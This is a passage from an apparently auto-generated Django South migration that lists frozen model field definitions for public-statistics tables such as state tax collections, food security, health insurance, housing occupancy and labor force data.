'total': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'unemployment_insurance': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'witheld_income_and_fica': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.federaltaxcollectionstateraw': {
'Meta': {'object_name': 'FederalTaxCollectionStateRaw'},
'business_income_taxes': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'estate_tax': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'estate_trust_income_tax': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'excise_taxes': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'gift_tax': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'income_employment_estate_trust_total': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'individual_notwitheld_seca': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'individual_witheld_fica': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'railroad_retirement': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'total_collections': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'unemployment_insurance': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '20', 'decimal_places': '2'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.fipscountycongressdistrict': {
'Meta': {'object_name': 'FipsCountyCongressDistrict'},
'congress': ('django.db.models.fields.IntegerField', [], {}),
'county_code': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'district_code': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state_code': ('django.db.models.fields.CharField', [], {'max_length': '2'})
},
'data.fipsstate': {
'Meta': {'object_name': 'FipsState'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'})
},
'data.foodsecuritystate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'FoodSecurityState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'food_insecure': ('django.db.models.fields.IntegerField', [], {}),
'food_insecure_percent': ('django.db.models.fields.FloatField', [], {}),
'food_secure': ('django.db.models.fields.IntegerField', [], {}),
'food_secure_high': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'food_secure_high_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'food_secure_low': ('django.db.models.fields.IntegerField', [], {}),
'food_secure_low_percent': ('django.db.models.fields.FloatField', [], {}),
'food_secure_marginal': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'food_secure_marginal_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'food_secure_percent': ('django.db.models.fields.FloatField', [], {}),
'food_secure_very_low': ('django.db.models.fields.IntegerField', [], {}),
'food_secure_very_low_percent': ('django.db.models.fields.FloatField', [], {}),
'household_total': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'no_response': ('django.db.models.fields.IntegerField', [], {}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.foodsecuritystateraw': {
'Meta': {'object_name': 'FoodSecurityStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'food_secure': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'food_secure_high': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'food_secure_low': ('django.db.models.fields.IntegerField', [], {}),
'food_secure_marginal': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'food_secure_very_low': ('django.db.models.fields.IntegerField', [], {}),
'household_total': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'no_response': ('django.db.models.fields.IntegerField', [], {}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.freeluncheligible': {
'Meta': {'object_name': 'FreeLunchEligible'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.freereducedluncheligible': {
'Meta': {'object_name': 'FreeReducedLunchEligible'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.freereducedluncheligiblecounty': {
'Meta': {'object_name': 'FreeReducedLunchEligibleCounty'},
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'county_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2', 'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.gender': {
'Meta': {'object_name': 'Gender'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'gender_abbr': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '1'}),
'gender_name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '10'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'data.halfpints': {
'Meta': {'object_name': 'HalfPints'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.headstartenrollment': {
'Meta': {'object_name': 'HeadStartEnrollment'},
'enrollment': ('django.db.models.fields.IntegerField', [], {}),
'funding': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.healthinsurance': {
'Meta': {'object_name': 'HealthInsurance'},
'all_people': ('django.db.models.fields.IntegerField', [], {}),
'covered': ('django.db.models.fields.IntegerField', [], {}),
'covered_pct': ('django.db.models.fields.FloatField', [], {}),
'covered_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'covered_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'direct_purchase': ('django.db.models.fields.IntegerField', [], {}),
'direct_purchase_pct': ('django.db.models.fields.FloatField', [], {}),
'direct_purchase_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'direct_purchase_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'govt': ('django.db.models.fields.IntegerField', [], {}),
'govt_pct': ('django.db.models.fields.FloatField', [], {}),
'govt_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'govt_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'medicaid': ('django.db.models.fields.IntegerField', [], {}),
'medicaid_pct': ('django.db.models.fields.FloatField', [], {}),
'medicaid_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'medicaid_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'medicare': ('django.db.models.fields.IntegerField', [], {}),
'medicare_pct': ('django.db.models.fields.FloatField', [], {}),
'medicare_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'medicare_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'military': ('django.db.models.fields.IntegerField', [], {}),
'military_pct': ('django.db.models.fields.FloatField', [], {}),
'military_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'military_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'not_covered': ('django.db.models.fields.IntegerField', [], {}),
'not_covered_pct': ('django.db.models.fields.FloatField', [], {}),
'not_covered_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'not_covered_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'private': ('django.db.models.fields.IntegerField', [], {}),
'private_employment': ('django.db.models.fields.IntegerField', [], {}),
'private_employment_pct': ('django.db.models.fields.FloatField', [], {}),
'private_employment_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'private_employment_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'private_pct': ('django.db.models.fields.FloatField', [], {}),
'private_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'private_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.healthinsurancestate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'HealthInsuranceState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'pop': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_ins_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'pop_18_34_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_no_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_no_ins_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_no_ins_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'pop_18_34_private': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_private_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_private_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_private_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_64': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_64_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_64_ins_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'pop_18_64_no_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_64_no_ins_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'pop_18_64_private': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_64_private_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_64_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_ins_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'pop_35_64_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_no_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_no_ins_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_no_ins_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'pop_35_64_private': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_private_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_private_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_private_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_ins_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'pop_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_no_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_no_ins_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'pop_over_64': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_ins_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'pop_over_64_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_no_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_no_ins_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_no_ins_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'pop_over_64_private': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_private_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_private_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_private_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_ins_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'pop_under_18_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_no_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_no_ins_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_no_ins_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'pop_under_18_private': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_private_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_private_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_private_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.healthinsurancestateraw': {
'Meta': {'object_name': 'HealthInsuranceStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'geoid': ('django.db.models.fields.CharField', [], {'max_length': '15'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'pop': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_no_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_no_ins_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_private': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_private_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_private_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_private_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_no_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_no_ins_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_private': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_private_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_private_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_private_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_no_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_no_ins_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_private': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_private_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_private_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_private_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_no_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_no_ins_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_private': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_private_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_private_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_private_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.highschooldropouts': {
'Meta': {'object_name': 'HighSchoolDropouts'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.highschoolother': {
'Meta': {'object_name': 'HighSchoolOther'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.housingoccupancystate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'HousingOccupancyState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'occupied_units': ('django.db.models.fields.IntegerField', [], {}),
'occupied_units_moe': ('django.db.models.fields.IntegerField', [], {}),
'occupied_units_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'occupied_units_percent_moe': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'owner_occupied': ('django.db.models.fields.IntegerField', [], {}),
'owner_occupied_moe': ('django.db.models.fields.IntegerField', [], {}),
'owner_occupied_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'owner_occupied_percent_moe': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'owner_vacancy_rate': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'owner_vacancy_rate_moe': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'renter_occupied': ('django.db.models.fields.IntegerField', [], {}),
'renter_occupied_moe': ('django.db.models.fields.IntegerField', [], {}),
'renter_occupied_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'renter_occupied_percent_moe': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'renter_vacancy_rate': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'renter_vacancy_rate_moe': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'total_units': ('django.db.models.fields.IntegerField', [], {}),
'total_units_moe': ('django.db.models.fields.IntegerField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'vacant_units': ('django.db.models.fields.IntegerField', [], {}),
'vacant_units_moe': ('django.db.models.fields.IntegerField', [], {}),
'vacant_units_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'vacant_units_percent_moe': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.housingoccupancystateraw': {
'Meta': {'object_name': 'HousingOccupancyStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'occupied_units': ('django.db.models.fields.IntegerField', [], {}),
'occupied_units_moe': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'occupied_units_percent': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2'}),
'occupied_units_percent_moe': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True'}),
'owner_occupied': ('django.db.models.fields.IntegerField', [], {}),
'owner_occupied_moe': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'owner_occupied_percent': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2'}),
'owner_occupied_percent_moe': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True'}),
'owner_vacancy_rate': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'owner_vacancy_rate_moe': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'renter_occupied': ('django.db.models.fields.IntegerField', [], {}),
'renter_occupied_moe': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'renter_occupied_percent': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2'}),
'renter_occupied_percent_moe': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True'}),
'renter_vacancy_rate': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'renter_vacancy_rate_moe': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'state_fips': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'total_units': ('django.db.models.fields.IntegerField', [], {}),
'total_units_moe': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'vacant_units': ('django.db.models.fields.IntegerField', [], {}),
'vacant_units_moe': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'vacant_units_percent': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2'}),
'vacant_units_percent_moe': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.individualeducationprograms': {
'Meta': {'object_name': 'IndividualEducationPrograms'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.kidshealthinsurance': {
'Meta': {'object_name': 'KidsHealthInsurance'},
'all_people': ('django.db.models.fields.IntegerField', [], {}),
'covered': ('django.db.models.fields.IntegerField', [], {}),
'covered_pct': ('django.db.models.fields.FloatField', [], {}),
'covered_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'covered_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'direct_purchase': ('django.db.models.fields.IntegerField', [], {}),
'direct_purchase_pct': ('django.db.models.fields.FloatField', [], {}),
'direct_purchase_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'direct_purchase_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'govt': ('django.db.models.fields.IntegerField', [], {}),
'govt_pct': ('django.db.models.fields.FloatField', [], {}),
'govt_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'govt_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'medicaid': ('django.db.models.fields.IntegerField', [], {}),
'medicaid_pct': ('django.db.models.fields.FloatField', [], {}),
'medicaid_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'medicaid_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'medicare': ('django.db.models.fields.IntegerField', [], {}),
'medicare_pct': ('django.db.models.fields.FloatField', [], {}),
'medicare_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'medicare_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'military': ('django.db.models.fields.IntegerField', [], {}),
'military_pct': ('django.db.models.fields.FloatField', [], {}),
'military_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'military_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'not_covered': ('django.db.models.fields.IntegerField', [], {}),
'not_covered_pct': ('django.db.models.fields.FloatField', [], {}),
'not_covered_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'not_covered_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'private': ('django.db.models.fields.IntegerField', [], {}),
'private_employment': ('django.db.models.fields.IntegerField', [], {}),
'private_employment_pct': ('django.db.models.fields.FloatField', [], {}),
'private_employment_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'private_employment_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'private_pct': ('django.db.models.fields.FloatField', [], {}),
'private_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'private_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.laborforcecounty': {
'Meta': {'unique_together': "(('year', 'state', 'county'),)", 'object_name': 'LaborForceCounty'},
'county': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.County']"}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'employment_total': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'labor_force_total': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'laus_code': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'unemployment_rate': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'unemployment_total': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.laborforcecountyraw': {
'Meta': {'object_name': 'LaborForceCountyRaw'},
'county_fips': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'county_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
